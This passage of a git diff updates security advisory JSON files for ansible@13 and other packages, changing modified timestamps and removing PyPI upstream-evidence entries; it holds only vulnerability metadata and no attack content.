advisories/BREW-snakeviz-CVE-2026-31958.json | 10 +- advisories/BREW-snakeviz-CVE-2026-35536.json | 18 +--- advisories/BREW-snakeviz-CVE-2026-49853.json | 10 +- advisories/BREW-snakeviz-CVE-2026-49854.json | 10 +- advisories/BREW-snakeviz-CVE-2026-49855.json | 10 +- advisories/BREW-snakeviz-CVE-2026-82397.json | 5 +- advisories/BREW-vs-preview-CVE-2014-1829.json | 10 +- advisories/BREW-vs-preview-CVE-2014-1830.json | 10 +- advisories/BREW-vs-preview-CVE-2015-2296.json | 10 +- advisories/BREW-vs-preview-CVE-2016-9015.json | 10 +- .../BREW-vs-preview-CVE-2017-18342.json | 10 +- .../BREW-vs-preview-CVE-2018-18074.json | 10 +- .../BREW-vs-preview-CVE-2018-20060.json | 10 +- .../BREW-vs-preview-CVE-2018-25091.json | 10 +- .../BREW-vs-preview-CVE-2019-11236.json | 10 +- .../BREW-vs-preview-CVE-2019-11324.json | 10 +- .../BREW-vs-preview-CVE-2019-20477.json | 10 +- .../BREW-vs-preview-CVE-2020-14343.json | 10 +- advisories/BREW-vs-preview-CVE-2020-1747.json | 10 +- .../BREW-vs-preview-CVE-2020-26137.json | 10 +- advisories/BREW-vs-preview-CVE-2020-7212.json | 10 +- .../BREW-vs-preview-CVE-2021-28363.json | 10 +- .../BREW-vs-preview-CVE-2021-33503.json | 10 +- .../BREW-vs-preview-CVE-2023-32681.json | 10 +- .../BREW-vs-preview-CVE-2023-43804.json | 10 +- .../BREW-vs-preview-CVE-2023-45139.json | 10 +- .../BREW-vs-preview-CVE-2023-45803.json | 10 +- .../BREW-vs-preview-CVE-2024-35195.json | 10 +- advisories/BREW-vs-preview-CVE-2024-3651.json | 10 +- .../BREW-vs-preview-CVE-2024-37891.json | 10 +- .../BREW-vs-preview-CVE-2024-47081.json | 10 +- .../BREW-vs-preview-CVE-2025-50181.json | 10 +- .../BREW-vs-preview-CVE-2025-50182.json | 10 +- .../BREW-vs-preview-CVE-2025-66034.json | 10 +- .../BREW-vs-preview-CVE-2025-66418.json | 10 +- .../BREW-vs-preview-CVE-2025-66471.json | 10 +- .../BREW-vs-preview-CVE-2026-21441.json | 10 +- .../BREW-vs-preview-CVE-2026-25645.json | 10 +- .../BREW-vs-preview-CVE-2026-44431.json | 10 +- .../BREW-vs-preview-CVE-2026-44432.json | 10 +- .../BREW-vs-preview-CVE-2026-45409.json | 10 +- 535 files changed, 1230 insertions(+), 4625 deletions(-) create mode 100644 advisories/BREW-papis-CVE-2026-84378.json create mode 100644 advisories/BREW-papis-CVE-2026-84379.json create mode 100644 advisories/BREW-papis-CVE-2026-84380.json create mode 100644 advisories/BREW-papis-CVE-2026-84381.json create mode 100644 advisories/BREW-papis-CVE-2026-84382.json diff --git a/advisories/BREW-ansible@13-CVE-2008-0299.json b/advisories/BREW-ansible@13-CVE-2008-0299.json index 90f1e1d58d5..cdc4049f11c 100644 --- a/advisories/BREW-ansible@13-CVE-2008-0299.json +++ b/advisories/BREW-ansible@13-CVE-2008-0299.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2008-0299", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wqmm-q65g-2hqr", "CVE-2008-0299", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2010-4340.json b/advisories/BREW-ansible@13-CVE-2010-4340.json index fd59a6c27b9..cdc12b21eb4 100644 --- a/advisories/BREW-ansible@13-CVE-2010-4340.json +++ b/advisories/BREW-ansible@13-CVE-2010-4340.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2010-4340", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w3j6-8j34-q43x", "CVE-2010-4340", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2012-3446.json b/advisories/BREW-ansible@13-CVE-2012-3446.json index 2de7b9d6549..794063e4aab 100644 --- a/advisories/BREW-ansible@13-CVE-2012-3446.json +++ b/advisories/BREW-ansible@13-CVE-2012-3446.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2012-3446", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-prcq-52f8-fp44", "CVE-2012-3446", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-1633.json b/advisories/BREW-ansible@13-CVE-2013-1633.json index e2c3b335808..60e563424a1 100644 --- a/advisories/BREW-ansible@13-CVE-2013-1633.json +++ b/advisories/BREW-ansible@13-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-1633", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2013.json b/advisories/BREW-ansible@13-CVE-2013-2013.json index cbfb3429786..6ff3ec3ca77 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2013.json +++ b/advisories/BREW-ansible@13-CVE-2013-2013.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2013", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8q2m-pwxf-jc7g", "CVE-2013-2013", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2030.json b/advisories/BREW-ansible@13-CVE-2013-2030.json index 44f581d91fa..8b1c4ffb3d1 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2030.json +++ b/advisories/BREW-ansible@13-CVE-2013-2030.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2030", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pxxv-rv32-2qgv", "CVE-2013-2030", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2104.json b/advisories/BREW-ansible@13-CVE-2013-2104.json index 28faf0e2a82..2da33ef60cb 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2104.json +++ b/advisories/BREW-ansible@13-CVE-2013-2104.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2104", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4rrr-j7ff-r844", "CVE-2013-2104", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2166.json b/advisories/BREW-ansible@13-CVE-2013-2166.json index 0c890292ce8..4b457f8f1e0 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2166.json +++ b/advisories/BREW-ansible@13-CVE-2013-2166.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2166", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-c3xq-cj8f-7829", "CVE-2013-2166", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2167.json b/advisories/BREW-ansible@13-CVE-2013-2167.json index d0692c101cc..98b184dd3ff 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2167.json +++ b/advisories/BREW-ansible@13-CVE-2013-2167.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2167", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9vg3-cf92-h2h7", "CVE-2013-2167", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2233.json b/advisories/BREW-ansible@13-CVE-2013-2233.json index 3bff51f69b2..7deb5d2eb2b 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2233.json +++ b/advisories/BREW-ansible@13-CVE-2013-2233.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2233", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9x6q-5423-w5v9", "CVE-2013-2233", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-2255.json b/advisories/BREW-ansible@13-CVE-2013-2255.json index 89934e4d2c0..1b2db312433 100644 --- a/advisories/BREW-ansible@13-CVE-2013-2255.json +++ b/advisories/BREW-ansible@13-CVE-2013-2255.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-2255", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qh2x-hpf9-cf2g", "CVE-2013-2255", @@ -45,14 +45,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-4259.json b/advisories/BREW-ansible@13-CVE-2013-4259.json index dcfc77a67d1..d8353eec05e 100644 --- a/advisories/BREW-ansible@13-CVE-2013-4259.json +++ b/advisories/BREW-ansible@13-CVE-2013-4259.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-4259", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fj24-ghp9-39v3", "CVE-2013-4259", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-4260.json b/advisories/BREW-ansible@13-CVE-2013-4260.json index e795159c3ff..a5a3a55d4f7 100644 --- a/advisories/BREW-ansible@13-CVE-2013-4260.json +++ b/advisories/BREW-ansible@13-CVE-2013-4260.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-4260", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pcqv-c46v-2p4v", "CVE-2013-4260", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2013-6480.json b/advisories/BREW-ansible@13-CVE-2013-6480.json index 315c511f09b..61f9544c6dc 100644 --- a/advisories/BREW-ansible@13-CVE-2013-6480.json +++ b/advisories/BREW-ansible@13-CVE-2013-6480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2013-6480", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g892-9h8m-r69r", "CVE-2013-6480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-0012.json b/advisories/BREW-ansible@13-CVE-2014-0012.json index 6cd9651aae5..f9aea0b088f 100644 --- a/advisories/BREW-ansible@13-CVE-2014-0012.json +++ b/advisories/BREW-ansible@13-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-0012", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-0105.json b/advisories/BREW-ansible@13-CVE-2014-0105.json index 952839e3550..052994c0066 100644 --- a/advisories/BREW-ansible@13-CVE-2014-0105.json +++ b/advisories/BREW-ansible@13-CVE-2014-0105.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-0105", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gwvq-rgqf-993f", "CVE-2014-0105", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-1402.json b/advisories/BREW-ansible@13-CVE-2014-1402.json index 24ac75703bc..429a1d259cc 100644 --- a/advisories/BREW-ansible@13-CVE-2014-1402.json +++ b/advisories/BREW-ansible@13-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-1402", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-1829.json b/advisories/BREW-ansible@13-CVE-2014-1829.json index e43042eb807..ecb75af79f9 100644 --- a/advisories/BREW-ansible@13-CVE-2014-1829.json +++ b/advisories/BREW-ansible@13-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-1829", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-1830.json b/advisories/BREW-ansible@13-CVE-2014-1830.json index 47929850807..c10d7a68dc6 100644 --- a/advisories/BREW-ansible@13-CVE-2014-1830.json +++ b/advisories/BREW-ansible@13-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-1830", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-2686.json b/advisories/BREW-ansible@13-CVE-2014-2686.json index 8a63878dceb..c23f7748cc4 100644 --- a/advisories/BREW-ansible@13-CVE-2014-2686.json +++ b/advisories/BREW-ansible@13-CVE-2014-2686.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-2686", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-49m5-2838-q2rv", "CVE-2014-2686", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-3146.json b/advisories/BREW-ansible@13-CVE-2014-3146.json index c286a1efddf..1c039e6e835 100644 --- a/advisories/BREW-ansible@13-CVE-2014-3146.json +++ b/advisories/BREW-ansible@13-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-3146", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-3498.json b/advisories/BREW-ansible@13-CVE-2014-3498.json index e23c790ea26..74b37ef37ae 100644 --- a/advisories/BREW-ansible@13-CVE-2014-3498.json +++ b/advisories/BREW-ansible@13-CVE-2014-3498.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-3498", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4cvm-5776-jx9f", "CVE-2014-3498", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4657.json b/advisories/BREW-ansible@13-CVE-2014-4657.json index 2faa4ce0208..914f82bd7b9 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4657.json +++ b/advisories/BREW-ansible@13-CVE-2014-4657.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4657", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qg47-5px9-32g7", "CVE-2014-4657", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4658.json b/advisories/BREW-ansible@13-CVE-2014-4658.json index 15f2e973d8f..4f47b2ece57 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4658.json +++ b/advisories/BREW-ansible@13-CVE-2014-4658.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4658", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5g4v-2pc6-4hh4", "CVE-2014-4658", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4659.json b/advisories/BREW-ansible@13-CVE-2014-4659.json index da75bc80573..3c058489f68 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4659.json +++ b/advisories/BREW-ansible@13-CVE-2014-4659.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4659", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6667-f46p-pg88", "CVE-2014-4659", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4660.json b/advisories/BREW-ansible@13-CVE-2014-4660.json index 7a12c7bd7c3..4b7945cdd19 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4660.json +++ b/advisories/BREW-ansible@13-CVE-2014-4660.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4660", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5xm4-jmpw-p6j3", "CVE-2014-4660", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4678.json b/advisories/BREW-ansible@13-CVE-2014-4678.json index ac0a6a889e6..6972e3b7e75 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4678.json +++ b/advisories/BREW-ansible@13-CVE-2014-4678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4678", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-66c7-5pwv-mm3j", "CVE-2014-4678", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4966.json b/advisories/BREW-ansible@13-CVE-2014-4966.json index 67ecedebdd3..cf646243352 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4966.json +++ b/advisories/BREW-ansible@13-CVE-2014-4966.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4966", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wqq5-c89p-3wc3", "CVE-2014-4966", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-4967.json b/advisories/BREW-ansible@13-CVE-2014-4967.json index 8b2b0792e85..7bd621eaa30 100644 --- a/advisories/BREW-ansible@13-CVE-2014-4967.json +++ b/advisories/BREW-ansible@13-CVE-2014-4967.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-4967", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-64cw-m57j-65xj", "CVE-2014-4967", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-7144.json b/advisories/BREW-ansible@13-CVE-2014-7144.json index 2e84888ba6e..29668fba572 100644 --- a/advisories/BREW-ansible@13-CVE-2014-7144.json +++ b/advisories/BREW-ansible@13-CVE-2014-7144.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-7144", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-7f2c-vp52-gmfw", "CVE-2014-7144", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2014-7231.json b/advisories/BREW-ansible@13-CVE-2014-7231.json index 87a9a1210bb..a9a076160c5 100644 --- a/advisories/BREW-ansible@13-CVE-2014-7231.json +++ b/advisories/BREW-ansible@13-CVE-2014-7231.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2014-7231", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v933-vx5p-j7w2", "CVE-2014-7231", @@ -42,14 +42,6 